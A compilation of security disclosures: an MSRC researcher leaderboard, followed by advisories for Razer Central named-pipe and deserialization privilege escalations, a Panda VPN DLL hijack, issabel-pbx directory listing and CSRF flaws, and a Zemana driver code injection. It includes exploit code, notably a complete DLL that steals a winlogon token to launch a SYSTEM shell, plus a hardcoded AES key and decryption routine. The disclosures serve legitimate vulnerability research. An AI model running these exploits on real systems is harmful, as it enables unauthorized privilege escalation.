Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.
The top three researchers of the 2023 Q2 Security Researcher Leaderboard are: Yuki Chen, HAO LI, wkai!
Check out the full list of researchers recognized this quarter here.

Congratulations to all the researchers recognized in this quarter’s Microsoft Researcher Recognition Program leaderboard! Thank you to everyone for your hard work and continued partnership to secure customers.

The top three researchers of the 2023 Q2 Security Researcher Leaderboard are: **Yuki Chen, HAO LI, wkai!**

Check out the full list of researchers recognized this quarter here.

Congratulations to the top Azure researchers this quarter: **goodbyeselene, HAO LI, basvdlouw!**

Congratulations to the top Office researchers this quarter: **Anonymous, zcgonvh, Harun Can!**

Congratulations to the top Windows researchers this quarter: **Yuki Chen, wkai, k0shl!**

This 2023 Q2 leaderboard reflects point values for cases that are:

*   Submitted and assessed by the MSRC team between April 1, 2023, and June 30, 2023
    
*   Submitted and assessed by the MSRC team between January 1, 2023, and March 31, 2023 (last program period), but assessed after April 1, 2023
    

Past MSRC Quarterly Leaderboards:

*   2023-04: MSRC 2022 Q1 Security Researcher Leaderboard
    
*   2023-01: MSRC 2022 Q4 Security Researcher Leaderboard
    
*   2022-10: MSRC 2022 Q3 Security Researcher Leaderboard
    
*   2022-07: MSRC 2022 Q2 Security Researcher Leaderboard
    
*   2022-04: MSRC 2022 Q1 Security Researcher Leaderboard
    
*   2022-02: MSRC 2021 Q4 Security Researcher Leaderboard
    
*   2021-10: MSRC 2021 Q3 Security Researcher Leaderboard
    

Keep up the awesome work and we look forward to seeing you next quarter!

_Madeline Eckert, MSRC_

Congratulations to the Top MSRC 2023 Q2 Security Researchers!

Improper Privilege Control in RazerCentralSerivce Named Pipe in Razer RazerCentral <=7.11.0.558 on Windows allows a malicious actor with local access to gain SYSTEM privilege via communicating with the named pipe as a low-privilege user and calling "AddModule" or "UninstallModules" command to execute arbitrary executable file.



**Summary**

**Product**

Razer CentralService

**Vendor**

Razer

**Severity**

High - Adversaries may exploit software vulnerabilities to obtain privilege escalation.

**Affected Versions**

Razer Central 7.11.0.558 and below

**Tested Versions**

Razer Central 7.8.0.381 to 7.11.0.558

**CVE Identifier**

CVE-2023-3514

**CVSS3.1 Scoring System**

**Base Score:** 7.8 (High) **Vector String:** CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Local

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview**

Razer Synapse 3 is a software suite developed by Razer, a leading gaming hardware manufacturer. It serves as a centralized hub for customizing and optimizing Razer peripherals, including keyboards, mice, headsets, and other gaming accessories. With its intuitive user interface, Synapse 3 allows gamers to personalize their devices by creating unique profiles, assigning macros, and fine-tuning settings such as lighting effects and DPI sensitivity. This software provides seamless integration with cloud storage, enabling users to access their personalized configurations from anywhere. With its advanced features and extensive compatibility, Razer Synapse 3 empowers gamers to enhance their gaming experience and gain a competitive edge.

**Description of the vulnerability**

There is a service named RazerCentralService.exe installed, which plays a crucial role in managing user information and notifications. Applications establish communication with this service through a namedpipe. However, an unfortunate bug exists in RazerCentralService.exe, which can potentially enable users with low privileges to execute code as the system. This vulnerability affects computers with the RazerCentralService installed.

The RazerCentralService.exe uses NamedPipe to communicate with other processes.

    pipe_name = r'\\.\pipe\{FC828A97-C116-453D-BD88-AD471496E03C}'
    

The provided code assigns the variable pipe_name with the name of the currently used pipe, represented as \\.\pipe\{FC828A97-C116-453D-BD88-AD471496E03C} in this example.

It’s important to note that several services can be accessed via NamedPipe without undergoing appropriate sanitization. This lack of sanitization exposes them to potential security risks.

    namespace Razer.ActionService
    {
    	// Token: 0x02000006 RID: 6
    	public enum RzServiceType
    	{
    		// Token: 0x0400001B RID: 27
    		UpdateManager = 2,
    		// Token: 0x0400001C RID: 28
    		AccountManager = 4,
    		// Token: 0x0400001D RID: 29
    		Notifications = 5,
    		// Token: 0x0400001E RID: 30
    		ActionCenter
    	}
    }
    

The \`UpdateManager\`\` service provides the following functionalities:

    public class UpdateManagerIpcWrapper : UpdateManagerIpcBase, IDisposable
    	{
    		// Token: 0x060002AA RID: 682 RVA: 0x00010510 File Offset: 0x0000E710
    		public UpdateManagerIpcWrapper(IUpdateController controller, IUpdateManager manager, INacServiceClient nacClient)
    		{
    			this.m_manager = manager;
    			this.m_controller = controller;
    			this.m_nacClient = nacClient;
    			this.m_controller.UpdatesAvailable += this.FireUpdatesAvailable;
    			this.m_manager.ProductRegistered += this.FireProductRegistered;
    			this.m_manager.CheckingForUpdates += this.FireCheckingForUpdates;
    			this.m_manager.InstallComplete += this.FireInstallComplete;
    			this.m_manager.DownloadProgress += this.FireDownloadProgress;
    			this.m_manager.DownloadComplete += this.FireDownloadComplete;
    			this.m_manager.ModuleInstallStart += this.FireModuleInstallStart;
    			this.m_manager.InstallProgress += this.FireInstallProgress;
    			this.m_manager.ModuleDownloadProgress += this.FireModuleDownloadProgress;
    			this.m_manager.ModuleDownloadComplete += this.FireModuleDownloadComplete;
    			this.m_manager.OptionalModuleInstallStart += this.FireOptionalModuleInstallStart;
    			this.m_manager.OptionalModuleInstallComplete += this.FireOptionalModuleInstallComplete;
    			this.m_manager.OptionalModuleUninstallStart += this.FireOptionalModuleUninstallStart;
    			this.m_manager.OptionalModuleUninstallComplete += this.FireOptionalModuleUninstallComplete;
    			manager.EndpointChange += this.FireEndpointChange;
    			base.RegisterHandler(Commands.AddModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleAddModule));
    			base.RegisterHandler(Commands.RemoveModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleRemoveModule));
    			base.RegisterHandler(Commands.Register, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegister));
    			base.RegisterHandler(Commands.RegisterForUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegisterForUpdates));
    			base.RegisterHandler(Commands.GetUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetUpdates));
    			base.RegisterHandler(Commands.GetInstalledOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetInstalledOptionalModules));
    			base.RegisterHandler(Commands.GetAvailableOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetAvailableOptionalModules));
    			base.RegisterHandler(Commands.GetOptionalModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetOptionalModules));
    			base.RegisterHandler(Commands.CheckForUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdates));
    			base.RegisterHandler(Commands.DownloadUpdate, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadUpdate));
    			base.RegisterHandler(Commands.PauseDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandlePauseDownload));
    			base.RegisterHandler(Commands.PauseModuleDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandlePauseModuleDownload));
    			base.RegisterHandler(Commands.CancelDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandleCancelDownload));
    			base.RegisterHandler(Commands.CancelModuleDownload, new Func<IRazerSocket, byte[], byte[]>(this.HandleCancelModuleDownload));
    			base.RegisterHandler(Commands.InstallUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleInstallUpdates));
    			base.RegisterHandler(Commands.GetInstalledSoftware, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetInstalledSoftware));
    			base.RegisterHandler(Commands.PostponeUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandlePostponeUpdates));
    			base.RegisterHandler(Commands.ShowUpdates, new Func<IRazerSocket, byte[], byte[]>(this.HandleShowUpdates));
    			base.RegisterHandler(Commands.SetIconPath, new Func<IRazerSocket, byte[], byte[]>(this.HandleSetIconPath));
    			base.RegisterHandler(Commands.InstallModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleInstallModules));
    			base.RegisterHandler(Commands.DownloadModule, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadModule));
    			base.RegisterHandler(Commands.UninstallModules, new Func<IRazerSocket, byte[], byte[]>(this.HandleUninstallModules));
    			base.RegisterHandler(Commands.GetRegisteredProducts, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetRegisteredProducts));
    			base.RegisterHandler(Commands.RegisterDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleRegisterDevices));
    			base.RegisterHandler(Commands.UnregisterDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleUnregisterDevices));
    			base.RegisterHandler(Commands.ClearRegisteredDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleClearRegisteredDevices));
    			base.RegisterHandler(Commands.GetRegisteredDevices, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetRegisteredDevices));
    			base.RegisterHandler(Commands.SetEndpoint, new Func<IRazerSocket, byte[], byte[]>(this.HandleSetEndpoint));
    			base.RegisterHandler(Commands.GetEndpointDetails, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetEndpointDetails));
    			base.RegisterHandler(Commands.GetEndpointDetailsEx, new Func<IRazerSocket, byte[], byte[]>(this.HandleGetEndpointDetailsEx));
    			base.RegisterHandler(Commands.Setting_SetCheckAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdatesAutomatically_Set));
    			base.RegisterHandler(Commands.Setting_GetCheckAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleCheckForUpdatesAutomatically_Get));
    			base.RegisterHandler(Commands.Setting_SetDownloadAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadAutomatically_Set));
    			base.RegisterHandler(Commands.Setting_GetDownloadAutomatically, new Func<IRazerSocket, byte[], byte[]>(this.HandleDownloadAutomatically_Get));
    			base.RegisterHandler(Commands.Setting_SetUpdateInterval, new Func<IRazerSocket, byte[], byte[]>(this.HandleUpdateInterval_Set));
    			base.RegisterHandler(Commands.Setting_GetUpdateInterval, new Func<IRazerSocket, byte[], byte[]>(this.HandleUpdateInterval_Get));
    			base.RegisterHandler(Commands.Setting_SetMaxDownloadSpeed, new Func<IRazerSocket, byte[], byte[]>(this.HandleMaxDownloadSpeed_Set));
    			base.RegisterHandler(Commands.Setting_GetMaxDownloadSpeed, new Func<IRazerSocket, byte[], byte[]>(this.HandleMaxDownloadSpeed_Get));
    			base.RegisterHandler(Commands.Event_ModuleInstallStart, new Func<IRazerSocket, byte[], byte[]>(this.RouteModuleInstallStart));
    			base.RegisterHandler(Commands.Event_ModuleInstallComplete, new Func<IRazerSocket, byte[], byte[]>(this.RouteInstallProgress));
    			base.RegisterHandler(Commands.Event_InstallComplete, new Func<IRazerSocket, byte[], byte[]>(this.RouteInstallComplete));
    		}
    

After thoroughly examining the code, we stumbled upon an interesting revelation: the AddModule and UninstallModules commands possess the crucial functionality required for generating a fraudulent module and running our binary with the highly desirable SYSTEM privilege. These commands have the ability to accept input in xml formats. By cleverly constructing a malicious xml input, we can make RazerCentralService.exe to execute our binary with the mighty SYSTEM privilege.

    def add_module():
    	product = 'Emily3'
    	module = 'my_test_module'
    
    	version = struct.pack('<IIII', 0x11223344, 0x11223344, 0x11223344, 0x11223344)
    	update_module = '''
    <a>
    <Module>
    	<AdminPrivilegeRequired>1</AdminPrivilegeRequired>
    	<SynapseRestartRequired>0</SynapseRestartRequired>
    	<Description>desc</Description>
    	<Name>my_test_module</Name>
    	<DisplayName>my_test_module</DisplayName>
    	<FileName>D:\\test.exe</FileName>
    	<Visible>1</Visible>
    	<IconPath>C:\\ProgramData\\Razer\\Razer Central\\Update\\GameBooster2\\AppIcon.ico</IconPath>
    	<LaunchFilePath>D:\\test.exe</LaunchFilePath>
    	<DownloadURL>http://127.0.0.1</DownloadURL>
    	<UninstallFilePath>C:\\Windows\\System32\\notepad.exe</UninstallFilePath>
    </Module>
    </a>
    '''
    
    def uninstall_modules():
    	product = 'Emily3'
    	modules = '''
    	<a>
    		<String>my_test_module</String>
    	</a>
    '''
    
    	data = serialize_string(product)
    	data += serialize_string(modules)
    
    	p = create_message(UpdateManager, UninstallModules, data)
    	send_packet(p)
    

Here is a proof of concept (POC) written in Python 2 that you can use to execute notepad.exe as the SYSTEM user. Simply run the POC code provided here.

**Reproduction Steps**

For simplicity, follow the following steps to re-produce.

1.  Install the Razer software.
2.  Install Python 2 and the necessary Python modules.
3.  Log in and wait for 3-5 minutes to ensure that the directory at C:\ProgramData\Razer\Razer Central\Accounts exists.
4.  Execute the exploit script using Python 2.

**Conclusion**

In summary, relying on an encrypted file with a hardcoded key is not a dependable security measure. When operating as the SYSTEM user, it is crucial to exercise prudence in your actions. To tackle this problem, consider implementing the following measures:

*   Verify that the NamedPipe has the appropriate permissions configured.
*   Sanitize any untrusted input originating from the NamedPipe to prevent potential vulnerabilities.

**Credits**

Phan Thanh Duy (@PTDuy) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

CVE-2023-3514: (CVE-2023-3514) RazerCentralSerivce unsafe NamedPipe permission Escalation of Privilege Vulnerability

Improper Privilege Control in RazerCentralSerivce Named Pipe in Razer RazerCentral <=7.11.0.558 on Windows allows a malicious actor with local access to gain SYSTEM privilege via communicating with the named pipe as a low-privilege user and triggering an insecure .NET deserialization.

**Summary**

**Product**

Razer CentralService

**Vendor**

Razer

**Severity**

High - Adversaries may exploit software vulnerabilities to obtain privilege escalation.

**Affected Versions**

Razer Central 7.11.0.558 and below

**Tested Versions**

Razer Central 7.8.0.381 to 7.11.0.558

**CVE Identifier**

CVE-2023-3513

**CVSS3.1 Scoring System**

**Base Score:** 7.8 (High) **Vector String:** CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Local

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

low

**User Interaction (UI)**

None

**Scope (S)**

Unchanged

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Product Overview**

Razer Synapse 3 is a software suite developed by Razer, a leading gaming hardware manufacturer. It serves as a centralized hub for customizing and optimizing Razer peripherals, including keyboards, mice, headsets, and other gaming accessories. With its intuitive user interface, Synapse 3 allows gamers to personalize their devices by creating unique profiles, assigning macros, and fine-tuning settings such as lighting effects and DPI sensitivity. This software provides seamless integration with cloud storage, enabling users to access their personalized configurations from anywhere. With its advanced features and extensive compatibility, Razer Synapse 3 empowers gamers to enhance their gaming experience and gain a competitive edge.

**Description of the vulnerability**

One of these services is called RazerCentralService.exe, which acts as a central service for managing user information and notifications. Other applications can communicate with this service through a named pipe. However, there is a bug in RazerCentralService.exe that allows a user with low privileges to execute code as a system on a machine with RazerCentralService installed.

While analyzing Razer software, we found that a file called RazerCentralService.exe``, which runs under the SYSTEM\`\` account, tries to access a non-existent file located at the following path:

    'C:\\ProgramData\\Razer\\Razer Central\\Accounts\\' + dirname +'\\Razer Central\\ConnectedAccounts\\ConnectedAccounts.bin'
    

The dirname variable represents a folder that begins with the prefix RZR_ followed by a series of hexadecimal characters. This folder is automatically generated once the user successfully logs into the system. Furthermore, we also verified the permissions assigned to the Razer Central folder.

    s:\windows\razer>icacls "C:\ProgramData\Razer\Razer Central\Accounts\RZR_xxxxxxxxxxxxxxxxxxxx\Razer Central"
    C:\ProgramData\Razer\Razer Central\Accounts\RZR_xxxxxxxxxxxxxxxxxxxx\Razer Central NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                                                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                                                               CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                                                               BUILTIN\Users:(I)(OI)(CI)(RX)
                                                                                               BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
    
    Successfully processed 1 files; Failed processing 0 files
    

Within this directory, we possess the flexibility to incorporate files or folders. Additionally, we hold the capability to substitute the ConnectedAccounts\ConnectedAccounts.bin file with our personalized iteration. This particular binary file is safeguarded through encryption, utilizing the AES-CBC algorithm. Notably, it employs a hardcoded key that conveniently facilitates both encryption and decryption operations.

    def decrypt_ConnectedAccounts():
    	iv = "RZR_0280d8694a5582614c434074453e"[:16].encode('utf-8')
    	key = base64.b64decode("11Ir9bXYlDOU0xiKQszUlZ2N57TNS/GCAyLnZfj6Ibo=")
    	print (len(key)*8)
    	ciphertext = open(r"C:\ProgramData\Razer\Razer Central\Accounts\RZR_0280d8694a5582614c434074453e\Razer Central\ConnectedAccounts\ConnectedAccounts.bin", 'rb').read()
    	print ('===========')
    	cipher = AES.new(key, AES.MODE_CBC, iv)
    	plaintext = cipher.decrypt(ciphertext)
    	print (plaintext)
    	print ('================')
    

The code snippet below demonstrates the execution of a specific piece of code when the ConnectedAccounts.bin file undergoes deserialization using a binary formatter. This code is located within the AccountManager.dll module, which is loaded by the RazerCentralService.exe process.

    		private void Load()
    		{
    			try
    			{
    				SettingReadResult setting = this.m_settingsController.GetSetting("Razer Central", "ConnectedAccounts", "ConnectedAccounts.bin", SettingSource.Local, SettingSource.Undefined);
    				if (!setting.Success)
    				{
    					if (setting.ResultLocal == LoadResult.Failed_DataNotFound)
    					{
    						ConnectedAccountsManager.Logger.Info("No connected account credentials found.");
    					}
    					else
    					{
    						ConnectedAccountsManager.Logger.Error("Failed to load connected account credentials: " + setting.ResultLocal);
    					}
    				}
    				else
    				{
    					using (MemoryStream memoryStream = new MemoryStream(setting.Setting.Value))
    					{
    						Aes aes = Aes.Create();
    						aes.BlockSize = 128;
    						aes.KeySize = 256;
    						aes.Key = Convert.FromBase64String(ConnectedAccountsManager.m_keyString);
    						aes.IV = this.IV;
    						using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
    						{
    							BinaryFormatter binaryFormatter = new BinaryFormatter();
    							this.m_credentials = (Dictionary<ConnectedAccount, ConnectedAccountCredentials>)binaryFormatter.Deserialize(cryptoStream);
    						}
    					}
    				}
    			}
    			catch (Exception exception)
    			{
    				ConnectedAccountsManager.Logger.Error("Exception loading connected account credentials", exception);
    				this.m_credentials = new Dictionary<ConnectedAccount, ConnectedAccountCredentials>();
    				this.Save();
    			}
    		}
    

By leveraging the power of ysoserial.net, we gain the ability to execute code with elevated privileges as the SYSTEM user. This process of deserialization occurs in two scenarios: when a user logs in or when the machine restarts. Moreover, we can also initiate the deserialization process by utilizing a named pipe. Notably, the RazerCentralService.exe grants read/write access to its pipe for all users.

    pipe_name = r'\\.\pipe\{FC828A97-C116-453D-BD88-AD471496E03C}'
    

Here is a proof of concept (POC) written in Python 2 that you can use to execute notepad.exe as the SYSTEM user. Simply run the POC code provided here

**Reproduction Steps**

For simplicity, follow the following steps to re-produce.

1.  Install the Razer software.
2.  Install Python 2 and the necessary Python modules.
3.  Log in and wait for 3-5 minutes to ensure that the directory at C:\ProgramData\Razer\Razer Central\Accounts exists.
4.  Execute the exploit script using Python 2.

**Conclusion**

Having great power entails having great responsibility. When you operate as the SYSTEM user, you possess substantial power and carry significant responsibilities. Therefore, it is crucial to exercise caution in your actions. Additionally, it is important to understand that relying solely on an encrypted file with a hardcoded key does not guarantee security. To address any potential issues, you can follow the suggested steps outlined below:

*   Avoid using binary formatter for deserialization.
*   Ensure correct permissions are set for your namedpipe.
*   Check your directory permissions.

**Credits**

Phan Thanh Duy (@PTDuy) of STAR Labs SG Pte. Ltd. (@starlabs\_sg)

CVE-2023-3513: (CVE-2023-3513) RazerCentralService unsafe deserialization Escalation of Privilege Vulnerability

A DLL hijacking vulnerability in Panda Security VPN for Windows prior to version v15.14.8 allows attackers to execute arbitrary code via placing a crafted DLL file in the same directory as PANDAVPN.exe.

**0x01: Details**

*   Title: Local privilege escalation in Panda Dome VPN for Windows Installer
*   CVE ID: None
*   Vendor ID : None
*   Advisory Published: 2023/07/05
*   Advisory URL : https://www.pandasecurity.com/en/support/card?id=100080

**0x02: Test Environment**

Panda Dome Version : 21.01.00

OS : Windows 10 Pro 64-bit 21H2 (build 19044.1826)

**0x03: Vulnerability details**

Vulnerability that allows a local attacker to gain SYSTEM privileges by exploiting administrator privileges, and that enables the server thread to perform actions on behalf of the client, but within the limits of the client’s security context.

**0x04: Technical description**

Many DLLs are loaded from the directory where the Panda Security VPN installer file PANDAVPN.exe is located. If these DLLs are not in the directory, DLLs are loaded from the C:\Windows\SysWOW64 directory. Among these Dlls, TextShaping.dll is loaded, and this DLL load is done with Administrator privileges. So, by placing TextShaping.dll in the directory where the Panda Security VPN installer file is located, you can gain SYSTEM privileges by abusing Administrator privileges.

**0x05: Proof-of-Concept (PoC)**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147

#include <stdio.h>
#include <windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>
#include <sddl.h>
#pragma comment (lib,"advapi32.lib")
int exploit() {
	DWORD lpidProcess[2048], lpcbNeeded, cProcesses;
	EnumProcesses(lpidProcess, sizeof(lpidProcess), &lpcbNeeded);
	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	PROCESSENTRY32 p32;
	p32.dwSize = sizeof(PROCESSENTRY32);

	int processWinlogonPid;

	if (Process32First(hSnapshot, &p32)) {
		do {
			if (wcscmp(p32.szExeFile, L"winlogon.exe") == 0) {
				printf("[+] Located winlogon.exe by process name (PID %d)\n", p32.th32ProcessID);
				processWinlogonPid = p32.th32ProcessID;
				break;
			}
		} while (Process32Next(hSnapshot, &p32));

		CloseHandle(hSnapshot);
	}

	LUID luid;
	HANDLE currentProc = OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId());

	if (currentProc) {
		HANDLE TokenHandle = NULL;
		BOOL hProcessToken = OpenProcessToken(currentProc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle);
		if (hProcessToken) {
			BOOL checkToken = LookupPrivilegeValue(NULL, L"SeDebugPrivilege", &luid);

			if (!checkToken) {
				printf("[+] Current process token already includes SeDebugPrivilege\n");
			}
			else {
				TOKEN_PRIVILEGES tokenPrivs;

				tokenPrivs.PrivilegeCount = 1;
				tokenPrivs.Privileges[0].Luid = luid;
				tokenPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

				BOOL adjustToken = AdjustTokenPrivileges(TokenHandle, FALSE, &tokenPrivs, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL);

				if (adjustToken != 0) {
					printf("[+] Added SeDebugPrivilege to the current process token\n");
				}
			}
			CloseHandle(TokenHandle);
		}
	}
	CloseHandle(currentProc);

	HANDLE hProcess = NULL;
	HANDLE TokenHandle = NULL;
	HANDLE NewToken = NULL;
	BOOL OpenToken;
	BOOL Impersonate;
	BOOL Duplicate;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, processWinlogonPid);

	if (!hProcess) {
		printf("[-] Failed to obtain a HANDLE to the target PID\n");
		return -1;
	}

	printf("[+] Obtained a HANDLE to the target PID\n");

	OpenToken = OpenProcessToken(hProcess, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &TokenHandle);

	if (!OpenToken) {
		printf("[-] Failed to obtain a HANDLE to the target TOKEN %d\n", GetLastError());
	}

	printf("[+] Obtained a HANDLE to the target TOKEN\n");

	Impersonate = ImpersonateLoggedOnUser(TokenHandle);

	if (!Impersonate) {
		printf("[-] Failed to impersonate the TOKEN's user\n");
		return -1;
	}

	printf("[+] Impersonated the TOKEN's user\n");

	Duplicate = DuplicateTokenEx(TokenHandle, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &NewToken);

	if (!Duplicate) {
		printf("[-] Failed to duplicate the target TOKEN\n");
		return -1;
	}

	printf("[+] Duplicated the target TOKEN\n");

	BOOL NewProcess;

	STARTUPINFO lpStartupInfo = { 0 };
	PROCESS_INFORMATION lpProcessInformation = { 0 };

	lpStartupInfo.cb = sizeof(lpStartupInfo);

	NewProcess = CreateProcessWithTokenW(NewToken, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &lpStartupInfo, &lpProcessInformation);

	if (!NewProcess) {
		printf("[-] Failed to create a SYSTEM process\n");
		return -1;
	}

	printf("[+] Created a SYSTEM process\n");

	CloseHandle(NewToken);
	CloseHandle(hProcess);
	CloseHandle(TokenHandle);

	return 0;
}

BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    switch (fdwReason) {
        case DLL_PROCESS_ATTACH: {
			exploit();
			exit(-1);
            break;
        }

        case DLL_THREAD_ATTACH: {
            break;
        }

        case DLL_THREAD_DETACH: {
            break;
        }

        case DLL_PROCESS_DETACH: {
            break;
        }
    }
    return TRUE;
}

1.  Use Visual Studio 2019.
2.  Compile the project in the DLL directory in x86 Release mode.
3.  Rename the compiled dll to TextShaping.dll and place it in the same directory as PANDAVPN.exe.
4.  Run PANDAVPN.exe to perform Panda Security VPN installation.

**0x06: Affected Products**

This vulnerability affects the following product:

*   Panda Security VPN Version < 15.14.8

**0x07: Credit information**

HeeChan Kim (@heegong123) of TeamH4C

**0x08: TimeLine**

*   2022/08/01 : First time contacted via Panda Security Email(secure@pandasecurity.com).
*   2022/08/10 : I recevied a file which is patched via Panda Security.
*   2023/07/05 : The vulnerability has been patched, and I have been notified that the vulnerability has been disclosed.
*   2023/07/09 : Request a CVE id via MITRE.

**0x09: Reference**

*   https://www.pandasecurity.com/en/homeusers/vpn/
*   https://www.pandasecurity.com/en/support/card?id=100080

This post is licensed under CC BY 4.0 by the author.

CVE-2023-37849: Local privilege escalation in Panda Dome VPN for Windows Installer

An issue in issabel-pbx v.4.0.0-6 allows a remote attacker to obtain sensitive information via the modules directory

**issabel-pbx 4.0.0-6 - Directory Listing**

**Description:** Issabel-pbx v.4.0.0-6 is vulnerable to Broken Access Control. The Directory Listing vulnerability allows any remote attacker to view the application's sensitive files within the modules directory of the application without any authorization.

**Vulnerable Product Version:** issabel-pbx 4.0.0-6

**Date:** 10/07/2023

**CVE:** CVE-2023-37599

**CVE Author:** Sahil Ojha

**Vendor Homepage:** https://www.issabel.org/

**Software Link:** https://github.com/IssabelFoundation/issabelPBX

**Tested on:** Windows

**Steps to reproduce:**

1.  Navigate to URL: https://{Issabel IP}/module. I found out that many important files of application can be accessed directly from this directory listing.

****************

CVE-2023-37599: GitHub - sahiloj/CVE-2023-37599: Directory Listing vulnerability in issabel-pbx 4.0.0-6 exposing application sensitive files

A Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows a remote attacker to cause a denial of service via the delete new virtual fax function.

**issabel-pbx 4.0.0-6 - Cross Site Request Forgery (CSRF) to delete any new virtual fax of users**

**Description:** Cross Site Request Forgery (CSRF) vulnerability in issabel-pbx v.4.0.0-6 allows any remote attacker to make the application data not accessible to users by exploiting delete new virtual fax function in the application.

**Vulnerable Product Version:** issabel-pbx 4.0.0-6

**Date:** 10/07/2023

**CVE:** CVE-2023-37598

**CVE Author:** Sahil Ojha

**Vendor Homepage:** https://www.issabel.org/

**Software Link:** https://github.com/IssabelFoundation/issabelPBX

**Tested on:** Windows

**Attack scenario:**  
When this CSRF exploit is hosted somewhere and users open or interact with this exploit in his browser with logged in session of issable application, user's new virtual fax will be deleted automatically from the admin panel/dashboard.

**Steps to reproduce:**

1.  Go to URL: https://{Issabel IP}/index.php?menu=faxnew&action=view&id=1 and login with admin credentials.
    
    ****
2.  Attempt to delete the Virtual Fax and capture the request in burp suite proxy, right-click on the request and go to “Engagement Tools --> Generate CSRF PoC”.
    
    ****
3.  Upon generating the CSRF exploit code shown below, copy the script and save it as html file.
    
4.  Send this file to the already logged-in user and when the user clicks on submit request the Virtual Fax will be deleted as shown in the figure below.
    
    ********

CVE-2023-37598: GitHub - sahiloj/CVE-2023-37598: CSRF vulnerability in issabel-pbx v.4.0.0-6 to delete any new virtual fax of users

Certain Zemana products are vulnerable to Arbitrary code injection. This affects Watchdog Anti-Malware 4.1.422 and Zemana AntiMalware 3.2.28.

**CVE-2022-42045****Summary**

We discovered an Arbitrary code injection in Zemana amsdk.sys kernel-mode driver, a part of Zemana Antimalware SDK. The vulnerability allows to inject an arbitrary code into the one of the driver code sections and then to execute it with kernel-mode privileges (local privileges escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.

**Details**

The vulnerable function is placed at the offset 0xBF60 from the start of the .text section of amsdk.sys. This function invokes another one at the offset 0xD664. The function at the offset 0xD664 gets 4 arguments:

1.  Target address: address of the function in .hook section with RWX access rights. In our case this argument points to the function at the offset 0x1D0 from the start of .hook sections
2.  Source address: address of a source buffer with user controlled code
3.  Some integer value. 128 in our case
4.  Some address of a some function inside ntoskrnl.exe. This function is invoked just after invoking of the code from argument 2. BUT before it this argument value is increased by the length of a code from argument 2 minus 1. This length is calculated by the embedded to the driver lightweight disassembler. So, after the invoking of a code from argument 2 the control is transferred to the arg\_4 + arg\_2\_length – 1.

